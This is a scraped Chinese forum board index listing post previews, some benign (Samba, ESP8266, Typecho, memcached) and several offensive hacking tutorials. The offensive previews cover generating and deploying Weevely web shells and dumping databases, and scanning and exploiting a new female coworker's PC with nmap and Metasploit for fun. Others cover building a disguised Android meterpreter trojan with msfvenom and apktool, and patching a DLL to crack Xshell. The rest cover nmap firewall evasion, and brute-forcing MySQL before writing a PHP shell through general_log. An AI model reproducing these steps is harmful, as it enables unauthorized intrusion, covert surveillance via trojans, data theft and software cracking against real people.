建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
366个主题在此版面
-
Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具,因此支持跨平台可以 任何有python环境的系统上使用。和Windows系统中一款类似的工具(中国菜刀)一样。 安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。 apt-get install weevely -y基础用法生成web shell格式如下: weevely generate <shell密码> <生成目录> 示例: weevely generate 8888 /root/88.php 连接web shell我们需将生成的web shell上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。 格式如下: weevely <URL> <password> [cmd] 示例: weevely http://192.168.1.2/88.php 8888 查看系统信息所需命令system_info 枚举用户文件枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过:audit_ filesystem ,来查看都支 持搜索哪些类型的用户文件。 查看PHP配置文件所需命令audit_phpconf 高级用法系统提权连接数据库sql_console sql_console -u root -p 12345678 对数据库进行脱裤所需命令:sql_dump sql_dump -dbms mysql tianyuan root 1…
-
- 0 篇回复
- 26 次查看
-
-
今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功…
-
- 0 篇回复
- 26 次查看
-
-
文件读取代码如下: package priess; import java.io.BufferedReader; import java.io.File; import java.io.FileReader; public class Mytxt { public static String txt2String(File file){ StringBuilder result = new StringBuilder(); try{ BufferedReader br = new BufferedReader(new FileReader(file));//构造一个BufferedReader类来读取文件 String s = null; while((s = br.readLine())!=null){//使用readLine方法,一次读一行 result.append(System.lineSeparator()+s); } br.close(); }catch(Exception e){ e.printStackTrace(); } return result.toString(); } public static void main…
-
- 0 篇回复
- 25 次查看
-
-
首先来看看GURB的效果 登录界面的效果 如何修改修改gurb boot进入kali,切换到文件目录cd//boot/grub/themes/kali/分别修改grub-4x3.png和grub-16x9.png这两个图片即可。注意图片格式为png大小像素不能发生变化。 修改登录背景修改文件/usr/share/backgrounds/kali/下的kali-light-16x9.png和kali-light-4x3.png即可。其他的根据分辨率自行修改。 PS:在修改的过程中,一定要注意图片的分辨率问题,这里建议将原图拖动到ps中,做覆盖处理即可,注意图片的格式为png。
-
- 0 篇回复
- 25 次查看
-
-
首先我们来了解下什么是公网什么是内网。所谓外网就是广域网。广域网(英语:Wide Area Network,缩写为 WAN),又称外网、公网。是连接不同地区局域网或城域网计算机通信的远程网。内网就是局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。如学校、医院、公安的网络。或者家庭中几台计算机组成的网络。而在实际情况中,外网一般有运营商提供服务,内网有一台路由器即可组建。比如你的手机和电脑在连接同一WiFi时,就处于同一局域网。现在我们来说说两者的区别! 对于公网ip可以所有人访问,如淘宝的服务器。而内网ip只能在同一局域网内的设备访问,如同一WiFi下的手机可以访问电脑。 现在我们思考我们shell的问题? 我们平时在利用msfvenom生成shell的时候,有这样一步 填写kali的ip地址和端口。 LHOST=192.168.232.195 LPORT=5555 这里的ip地址就是我们内网的ip。也就是只有我们内网的设备才能访问到192.168.232.195而外网的设备无法访问。那么我们该如何生成外网的shell呢?姿势一 调戏运营商客户获取公网ip此方法因地域成功率也不高,有的地方是绝对不可能给你的。如xj而东南沿海一般可以试试。通过和客户沟通,说你设备要绑定公网ip,各种调戏各种软磨硬泡或许会给你绑定。如果此方法不同,可以试试下面方法;故意将家中网络搞坏,叫人工报修。师傅会上门处理,这时给师傅一盒中华和师傅拉拉家常,会有意想不到的结果。因为报修师傅地位很低,通常是按处理的工单给…
-
- 0 篇回复
- 25 次查看
-
-
xshell和xftp是自己常用的两个软件,但是时不时的要求你更新,不更新还不能使用。打开时弹出“要继续使用此程序,您必须应用最新的更新或使用新版本”。 解决方法用二进制编辑器打开Xshell/Xftp安装目录下的 nslicense.dll搜索7F 0C 81 F9 80 33 E1 01 0F 86 80/81 替换为:7F 0C 81 F9 80 33 E1 01 0F 83 80/81保存退出即可 注意:注:直接打开nslincense.dll可能没有编辑权限,可以copy一份到其他地方,然后进行修改,再将修改后的dll文件替换掉Xshell、Xftp安装目录下的dll 本文适用于Xsehll、Xftp 5,也适用于Xshell、Xftp 6,5和6的区别仅仅在于: 版本5的十六进制串为:7F 0C 81 F9 80 33 E1 01 0F8680, 版本6的十六进制串为:7F 0C 81 F9 80 33 E1 01 0F8681,但不影响。 动手试试下载C32Asm(文末提供下载) 将nslicense.dll复制到桌面,并在C32Asm中打开。Ctrl+f搜索0F8681 将0F8681替换为0F8381保存即可 将保存好的文件复制到xshell或xftp的根目录下,成功运行! 附件下载xshell xftp解决强制更新
-
- 0 篇回复
- 25 次查看
-
-
<div class="joe_census__server"> <div class="joe_census__server-item"> <div class="title">实时负载</div> <div class="content"> <div id="work"></div> </div> </div> <div class="joe_census__server-item"> <div class="title"> <span>实时流量</span> <div class="count"> <span class="up">总发送:0 B</span> <span class="split">/</span> <span class="down">总接收:0 B</span> </div> </div> <div class="content">…
-
- 0 篇回复
- 25 次查看
-
-
笔者的环境中有几台Linux的服务器,在上传文件的时候通常都是用ssh进行上传。但是文件上传比较慢,而且每次都需要登录ssh。就想着能不能用windows那样,方便快捷呢?Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件。 安装sudo apt-get install sambakali下已经默认安装,直接使用即可。 修改samba的配置文件sudo vi /etc/samba/smb.conf 添加下面内容 [share] path=/home/priess #文件共享的路劲 public=no #禁止匿名访问 writable=yes #写入权限 valid user=priess #登录用户名 注意登录的用户名必须为系统中存在的用户名,如root 给用户名添加密码sudo smbpasswd -a priess填坑 出现Failed to add entry for user 说明你的用户名在系统中不存在,需要添加一个用户名。 列出现有的Samba用户列表: pdbedit -w -L重启samba服务 service smbd restart和windows连接在windows->计算机,点击映射网络驱动器;输入\192.168.1.102\share(请根据自己的ip和共享文件夹标识调整)。此时,就可以在windows上看到linux共享的文件夹了。 访问网络磁盘
-
- 0 篇回复
- 25 次查看
-
-
所需库ArduinoJson.hOLED.h 若提示没有ESP8266WiFi.h库,请选择你的开发版即可。 库下载: Arduinojson.h Oled库 将库下载后放到Arduino的libraries目录下 代码#include <ESP8266WiFi.h> #include <ArduinoJson.h> #include <Wire.h> #include "OLED.h" static const char logo[] PROGMEM={ 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0x7f,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0x03,0x00,0xf0,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0x7f,0x00,0x00,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0…
-
- 0 篇回复
- 24 次查看
-
-
一次去朋友家玩,看见他家垃圾角落里有台废主机。说是要丢掉,对于我来说怎么会舍得。于是我兴高采烈的抱回了家!开始了变废为宝的脱变。先来看看外观 先给洗洗澡吧 由于手头没有专业的清洗工具,自家水龙头走起。 从新组装电脑过程很简单,怎么拆的怎么装就是了。这里就不再描述了! 装玩即后,测试开机但是无法开机! 检测后发现估计主机电源坏了 恰好手里面以前在垃圾站拆过一个主机电源,应该好的! 于是便开始了移花接木! 由于拆下来的电源比较大,这个机箱比较小。就只能凑合这样用了。 安装系统改换电源后,主机成功点亮。接下来就是安装系统了。这次我安装了Centos8 安装准备 U盘一个(32G)UltraISO(百度自行下载)centos8镜像文件 制作U盘启动打开UltraISO 文件——打开 选择你下载的Centos8的镜像文件,格式为iso 启动——写入镜像文件 U盘启动进入BIOS设置U盘为第一启动项或者在boot菜单中选择U盘即可! 开始进入安装 选择第一个Install Centos 8 等待检测 此过程可能要等待会儿 可能会提示以下错误 在选择Install Centos 7后,几分钟后,弹出如下提示: Entering emergency mode.Exit the shell to continue. Type "journalct1" to view system logs. You might want to save "/run/initramfs/rdsosreport.txt/" to a USB stick…
-
- 0 篇回复
- 24 次查看
-
-
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 下载安装点击下面的连接开始下载,并配置config.inc.php文件。 $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'dvwa'; $_DVWA[ 'db_password' ] = '123456';更改为你的数据库账号信息。 登录创建数据库访问http://127.0.0.1输入账号和密码均为admin点击Create / Reset Database创建数据库,当数据库创建完成后,会自动登出,用户名:admin密码:password重新登录。 配置完成后的界面 这样dvwa的安装和配置就完成了。 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(low)Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。 准备user.txt pass.txt(用户字典和密码字典)神器burp 在burp中抓包打开浏览器,在该模块任意输入账号和密码,在burp中抓包。 抓到包后,右键send ro intruder 在intruder的positions选择中,先点击clear$清除所有的变量。 然后…
-
- 0 篇回复
- 24 次查看
-
-
笔者有时需要将手机屏幕内容投屏到PC端,用作演示。那么如何来做到这点呢? 准备手机一部USB数据线 安装scrcpy在kali中执行下面命令 apt-get install scrcpy 这样便完成了安装 使用首先开启手机的开发者模式--USB试调 通过USB连接电脑后,终端执行命令scrcpy即可 通过无线连接首先执行下面命令开启无线试调 adb tcpip 5555拔掉数据线后执行 adb connect 192.168.1.x:5555最好执行adb devices查看设备 同上,执行在终端中执行scrcpy即可连接手机。 其他如果有多个设备 scrcpy -s ip:5555如果无线比较卡加上参数-b 4m 限制码率,--max=fps限制帧率。 视频演示
-
- 0 篇回复
- 24 次查看
-
-
防火墙是位于计算机和他网络连接直接的软件。防火墙能对经过的他的网络流量进行分析,并过滤掉一些攻击。当然防火墙可以关闭和隐藏部分端口,以免暴露和利用。最后它可以禁止指定的ip访问。 参数说明: 选项数量-f报文分段--mtu指定偏移大小-DIP欺骗-sI源地址欺骗--source-port源端口欺骗--data-length指定发包长度--spoof-macMAC地址欺骗--randomize-hosts目标主机随机排序报文分段在nmap中利用-f将TCP包分段在几个包中,使得包过滤器的检测更加困难。 nmap -f -v 192.168.123.1 指定偏移大小使用--mtu来指定偏移大小,设定TCP/IP协议的传输最大值,以此来逃避防火墙。需要注意的是偏移量是8的倍数。 nmap --mtu 32 192.168.123.1 IP欺骗使用-D选项就可以达到IP欺骗的目的,使用该选项在进行扫描时,在随机产生IP地址扫描而非我们真实的IP扫描。 使用-D选项可以指定多个IP或者使用RND随机生成几个IP地址。 nmap -D RND:11 192.168.123.1 源地址欺骗/源端口欺骗使用-sI就可以进行源地址欺骗,使用--source-port就可以进行源端口欺骗,通过这种攻击管理员可能会认为这种端口不会有攻击发生。 nmap --source-port 53 192.168.123.1 mac地址欺骗使用--spoof-mac便可以进行mac欺骗扫描,在扫描时我们使用0随机分配一个mac地址。
-
- 0 篇回复
- 24 次查看
-
-
互联网时代,无论是个人还是企业都已经离不开网络。而网络安全问题却是企业中最薄弱的一环。除了一些知名的网络安全公司外,另外一些企业在网络安全领域几乎是0,本文将会为您阐述当前企业所面临的网络安全问题。 当前企业所面临的网络安全问题员工网络安全意识淡薄。缺乏专业的网络全运维人士。缺乏专业的IT专员。设备陈旧,能用就行。IT人员地位低,删库跑路时有发生。老板只顾赚钱,忽略细节问题。 企业网络安全——“内忧外患”内忧:公司内部发生的网络安全问题,如删库跑路,间谍等。 外患:来自外部的恶意攻击。 内忧通常都是员工计算机操作能力低下,操作失误,工作心态等问题导致的安全问题。 内忧之删库跑路 删库跑路原因无非有一下两点 员工存在报复心态员工失误操作 内忧之员工业务能力低下企业中,由于部分员工缺乏相应的安全知识和技能,导致设备中毒是常有的事。如要下载某个软件,不去官网下载而是直接去度娘下载。结果下载的软件全是广告推广程序。在或者有的员工喜欢在上班期间搞点小刺激,看会儿小片儿,结果下载的全是病毒。 外患常见的攻击方法基于WiFi的攻击 首先对目标公司进行信息收集,法人信息,公司地理位置,座机号码等信息。(小公司的座机号码一般都是宽带账号,利用座机号码打客服电话可以查看公司的宽带账号。) 破解WiFi 对于公司而言,一个万能钥匙拯救一切,因为员工都懒得输密码。要么都是很简单的那种密码。 那么问题来了,WiFi的信号范围都是有限的,我该如何连接WiFi呢。总不能跑到人家办公室吧? 如上,我们可以在这个范围内借助一些大功率无线网卡实现攻击。 通过WiFi…
-
- 0 篇回复
- 24 次查看
-
-
前言原因分析:在后台设置了阅读量后,前台不显示。 查找原因经过查找,找到了下面代码 <span><?php if(isset($this->fields->viewsNum)){ _e('<i class="iconfont icon-eye"></i> 浏览量 '); $this->fields->viewsNum(); } ?></span>看来是调用了typecho的自定义字段功能,自定义字段为viewsNum。 分析typecho的自定义字段功能调用字段$field = $this->fields->fieldName;输出字段$this->fields->fieldName();判断字段if(isset($this->fields->fieldName)){ echo '字段存在,值为:'.$this->fields->fieldName; }else{ echo '字段不存在'; }经过判断发现字段viewsNum不存在。 接着进行分析: 在functions文件末尾,发现以下语句。 function viewCounter($archive){ $cid = $archive->cid; $views = Typecho_Cookie::get('__typecho_views'); $views = !empty($views) ? explode(',…
-
- 0 篇回复
- 24 次查看
-
-
一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell
-
- 0 篇回复
- 24 次查看
-
-
-
pushState + ajax = pjax 带来最直观的效果是整个网站变成单页应用。这样的效果将会极大的提升用户体验,并且可以减少https的请求的次数和内容。使用github上面的一个开源项目defunkt/jquery-pjax 可以很轻松的帮助我们实现pjax。 需要具备基础的html & javascript 知识。如果你连div和script标签仍然不认识,请忽略该篇文章。 引入js在header.php或者footer.php中添加下面代码 <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script> <script src="//cdn.bootcss.com/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>注意顺序,不能错哦! 实现代码<script> //pjax 刷新 $(document).pjax('a[href^="<?php Helper::options()->siteUrl()?>"]:not(a[target="_blank"], a[no-pjax])', { container: '#pjax-container', fragment: '#pjax-container', timeout: 3000 }).on('pjax:send', function() { …
-
- 0 篇回复
- 24 次查看
-
-
Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap sc…
-
- 0 篇回复
- 24 次查看
-
-
memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-…
-
- 0 篇回复
- 24 次查看
-
-
1.检查apache是否已经加载了mod_deflate模块。 输入命令httpd -M 查看,若显示有deflate_module (shared)这个字段,则说明该模块已经加载成功。 2.找到配置文件httpd.conf 并修改,修改方法为在最后加上如下一段代码: (PS:此配置文件的位置一般在两个地方/etc/https/conf/httpd.conf 或者 /usr/local/apache/conf/httpd.conf) <ifmodule mod_deflate.c> SetOutputFilter DEFLATE SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:pdf|mov|avi|mp3|mp4|rm)$ no-gzip dont-vary DeflateCompressionLevel 6 AddOutputFilterByType DEFLATE text/html text/plain text/xml application/x-httpd-php AddOutputFilter DEFLATE js css </ifmodule>3.重启Apache服务 service httpd resta…
-
- 0 篇回复
- 23 次查看
-
-
首先要获得systeminfo cmd里面执行systeminfo > systeminfo.txt 这样就得到了系统信息 在脚本Windows-Exploit-Suggester的目录下执行命令 ./windows-exploit-suggester.py –update 进行更新会得到一下 日期+-mssb.xls的文件 继续执行命令 ./windows-exploit-suggester.py –audit -l –database 2018-06-06-mssb.xls –systeminfo systeminfo.txt > ok.txt 最后会得到一个ok.txt打开就可以看到漏洞了
-
- 0 篇回复
- 23 次查看
-
-
KodExplorer可道云,原名芒果云,是基于Web技术的私有云在线文档管理解决方案 。Kod,读音通code,意为“代码,编码”,中文名为“可道”。 用户只需通过简单环境搭建,即可使用KodExplorer快速完成私有云/私有网盘/在线文档管理系统的部署和搭建。KOD提供了类windows用户界面,延续了windows平台的操作逻辑和使用习惯,支持100余种文件格式的在线预览,使得用户的私有云产品可以拥有本地操作一样方便、快捷、安全的体验;为企业用户提供了了文件在线存储与管理、分享和跨平台访问、群组与权限、生产流转、审批存档等全生命周期的在线文档管理的解决方案。 配置环境service apache2 start service mysql start mysql -u root -p #登录数据库 create database kod #创建数据库kod进入网站更目录cd /var/www/html 下载最新版的kodcloud wget http://static.kodcloud.com/update/download/kodbox.1.15.zip unzip kodbox.1.15.zip && chmod -Rf 777 ./*浏览器访问树莓派的IP地址进行安装。 如果缺少相应的环境,安装缺少的即可。 最后利用刚才设置的信息,登录即可。
-
- 0 篇回复
- 23 次查看
-
-
Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。 一:利用nmap对目标进行信息收集命令如下: nmap -T4 -A 192.168.123.239 从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。 二:对目标站点进行扫描命令如下: dirb http://192.168.123.239 通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。 在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。 三:利用nmap暴力破解mysql命令如下: nmap -p 3306 --script=mysql-brute.nse 192.168.123.239 如上,通过暴力破解,我们得到了账号和密码为root和123456 四:尝试远程登录命令如下: mysql -h 192.168.123.239 -u root -p成功登录数据库 利用phpMyAdmin拿shell在前期的文章中提到过,我们先登录到phpMyAdin 执行下面的sql语句 SET GLOBAL GENERAL_log='on'; SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php'; SELECT '<?php phpinfo(); ?>';需要注意的是,一定要写对目标的站点根目录的绝对地址 …
-
- 0 篇回复
- 23 次查看
-
-
清单esp8266开发版继电器(用去控制220v家庭电路),本实例用LED灯代替。电洛铁 焊锡 电线若干 电路图 实例代码#include <ESP8266WiFi.h> #include <WiFiClient.h> #include <ESP8266WebServer.h> #include <ESP8266mDNS.h> const char* ssid = "PDCN"; const char* password = "1234567890"; ESP8266WebServer server(80); String html = "<!DOCTYPE html><html lang=\"en\"><head><meta charset=\"UTF-8\"><title>Priess的小灯</title><body><a href=\"./pin?light=on\"><input type=\"button\" value=\"on\"></a> <a href=\"./pin?light=off\"><input type=\"button\" value=\"off\"></a></body></head></html>"; void pin(){ if(server.arg…
-
- 0 篇回复
- 23 次查看
-